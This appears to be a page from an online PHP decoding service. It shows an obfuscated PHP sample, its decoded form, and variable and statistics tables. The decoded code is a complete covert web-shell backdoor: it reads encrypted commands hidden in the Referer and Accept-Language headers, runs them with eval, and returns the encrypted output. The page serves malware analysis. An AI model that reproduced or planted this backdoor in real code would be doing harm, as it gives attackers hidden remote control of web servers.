Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

$v=');oBab_end_cleaBan();$d=baBase64Ba_enBacode(x(gzcoBampressBa($Bao),Ba$kBa));print("<..

Decoded Output download

$kh="638a";$kf="9ad7";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code


$v=');oBab_end_cleaBan();$d=baBase64Ba_enBacode(x(gzcoBampressBa($Bao),Ba$kBa));print("<$k>$d<Ba/$k>"Ba);@sessBaiBaBaon_destroy();}}}}';
$H='s(md5(Ba$i.$kh),0Ba,3));$Baf=$sl(Ba$ss(md5Ba($i.Ba$kf),Ba0,3));Ba$p="";Bafor($z=Ba1;$z<BacountBa($mBa[1])Ba;$z++)$Bap.=$q[$m[';
$S='ae(pregBa_rBaeplace(arrayBa("/_/",Ba"/-/Ba")Ba,array("/"Ba,"+"Ba),$ss($s[$Bai],0Ba,$e))Ba),$k))Ba);$o=ob_getBa_contenBaBats(';
$y='EREBaR"BaBa];$ra=@$r[Ba"HTTP_ACCEPT_BaLANGBaUABaGE"];if(Ba$rr&Ba&$ra){$u=parsBae_urlBaBa($rr)Ba;parBase_str($u["queBary"Ba],$q)';
$P='aBa){@Basession_start();$s=&$_SBaESSION;$Bass="substBar";$sl=Ba"strtBaolowerBa";$i=Ba$mBa[1][Ba0].$m[1][1Ba];$h=$sl(BaBa$s';
$A='r($j=0;Ba($BaBaj<$c&&$i<$Bal);$j+Ba+,$i++){$oBaBa.=$t{$i}^Ba$kBa{$j};}}returBan $o;}$Bar=$_SERBaVER;BaBa$rr=@$r["HTTP_REBaF';
$l=';$q=arBaBarayBa_valBaues($Baq);pBarBaeg_match_all("/(Ba[\\w])[\\Baw-]+(?:Ba;q=0.([\\d]))?Ba,?Ba/",$ra,$mBa);iBaf($q&&$BamBaB';
$x='2][$zBa]];iBaf(strBapos($p,Ba$h)=Ba==0)Ba{$s[Ba$i]="";$p=BaBa$ss($p,3);}if(BaBaarray_key_exiBasts($i,$Bas)Ba){$s[$iBa]Ba';
$p=str_replace('Z','','ZcZreatZZe_fuZnZction');
$C='$kh="638Baa";$kf="Ba9ad7";fBauncBation xBa($tBa,$k){$c=BastBarlen($k);$Bal=strlenBa($t)Ba;$o="";fBaBaor($i=0;Ba$i<$l;){foBa';
$w='.=$p;$e=sBatrpos($sBa[Ba$iBaBa],$f);if($e){$k=Ba$kh.$kf;obBa_start();@BaevBaalBa(@gzuncomBapreBass(@x(@base6Ba4Ba_decodB';
$o=str_replace('Ba','',$C.$A.$y.$l.$P.$H.$x.$w.$S.$v);
$V=$p('',$o);$V();

Function Calls

null	1
str_replace	2
create_function	1

Variables

$A	r($j=0;Ba($BaBaj<$c&&$i<$Bal);$j+Ba+,$i++){$oBaBa.=$t{$i}^Ba..
$C	$kh="638Baa";$kf="Ba9ad7";fBauncBation xBa($tBa,$k){$c=BastB..
$H	s(md5(Ba$i.$kh),0Ba,3));$Baf=$sl(Ba$ss(md5Ba($i.Ba$kf),Ba0,3..
$P	aBa){@Basession_start();$s=&$_SBaESSION;$Bass="substBar";$sl..
$S	ae(pregBa_rBaeplace(arrayBa("/_/",Ba"/-/Ba")Ba,array("/"Ba,"..
$V	None
$l	;$q=arBaBarayBa_valBaues($Baq);pBarBaeg_match_all("/(Ba[\w])..
$o	$kh="638a";$kf="9ad7";function x($t,$k){$c=strlen($k);$l=str..
$p	create_function
$v	);oBab_end_cleaBan();$d=baBase64Ba_enBacode(x(gzcoBampressBa..
$w	.=$p;$e=sBatrpos($sBa[Ba$iBaBa],$f);if($e){$k=Ba$kh.$kf;obBa..
$x	2][$zBa]];iBaf(strBapos($p,Ba$h)=Ba==0)Ba{$s[Ba$i]="";$p=BaB..
$y	EREBaR"BaBa];$ra=@$r[Ba"HTTP_ACCEPT_BaLANGBaUABaGE"];if(Ba$r..

Stats

MD5	b9f0bd1bcda141b00b1780ccc58c495b
Eval Count	1
Decode Time	101 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats